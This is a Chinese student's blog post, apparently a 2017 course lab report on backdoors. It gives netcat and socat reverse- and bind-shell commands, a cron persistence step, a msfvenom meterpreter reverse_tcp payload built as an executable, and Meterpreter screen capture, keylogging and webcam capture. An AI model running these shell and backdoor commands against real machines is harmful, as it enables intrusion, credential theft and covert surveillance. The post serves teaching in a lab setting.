• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
20145207李祉昂
博客园    首页    新随笔    联系   管理    订阅  订阅

20145207《网络对抗》MAL后门原理与实践

20145207《网络对抗》MAL后门原理与实践

基础问题回答

(1)例举一个后门进入到你系统中的可能方式?

下载软件,淘宝虚假链接,买卖账号时侵入的黑客

(2)例举一个后门启动起来(win及linux)的方式?

软件伪装的方式来让他人在不知情况下点进去,

(3)Meterpreter有哪些给你映像深刻的功能?

获得摄像头控制权,获得system权限,得到密码

(4)如何发现自己有系统有没有被安装后门?

杀毒软件算不算(尴尬)

实验总结与体会

开始感觉屌屌的,虽然确实可以盗取获得一些东西,摄像权密码之类的,虽然很厉害,很能拿出去装x。但是要求条件好苛刻,需要关人家防火墙,还得跟人家桥接,同一网段还得知道ip。瞬间感觉好智障,人家怎么会那样让你侵入。。

实践一:ncat

知识要求:

1.NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection);
2.netcat实现简单服务器命令:nc -l -p //-l表明nc处于监听模式,-p指定端口号;
3.nc的-e选项,指定连接后执行的程序。
windows获得linux shell
  • windows作为攻击端开启监听模式ncat.exe -l -p 5207
  • linux反弹连接并且设置连接后启动shell。nc 172.30.202 5207 -e /bin/sh

linux获得windows shell。

相反的步骤,在windows下进行即可。

ncat文件传输

1、监听端windows命令:ncat.exe -lv port > filename

2、传输端kali命令:nc windows_ip port < filename

结果如下(传输的文件在ncat文件夹下):

cron启动

命令:crontab -e修改文件,crontab -l查看修改的文件。

实践二:socat

windows获得kali shell

1、kali设置监听命令socat tcp-l:5207 system:bash,pty,stderr

2、windows连接,并获取权限socat readline tcp:172.30.1.181 5207

结果:

kali获得window shell

1、windows端如下图:

2、kali端意思一样的,忘了截了。

实践三:

1、生成后门程序命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=linux_ip LPORT=444 -f exe >20145207.exe

2、在windows端运行后门程序,并获得权限如下图所示:

实践四

1.获取目标主机当前屏幕界面

 (破虚拟机卡的我差点重写)

2.获取键盘内容。keyscan_start为开始获取目标主机键盘输入内容,keyscan_dump为结束获取目的主机键盘内容,输入之后会显示键盘的输入内容

3.获取目标主机摄像头记录

 

posted @ 2017-03-18 02:24  20145207李祉昂  阅读(189)  评论(0)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3